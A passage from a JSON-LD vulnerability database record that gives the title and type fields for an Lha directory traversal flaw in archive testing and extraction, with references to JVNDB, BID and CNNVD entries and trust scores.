          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Lha Directory Traversal Vulnerability in Testing and Extracting Process",
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2004-000170"
      }
    ],
    "trust": 0.8
  },
  "type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Unknown",
    "sources": [
      {
        "db": "BID",
        "id": "10243"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-200408-176"
      }
    ],
    "trust": 0.9
  }
}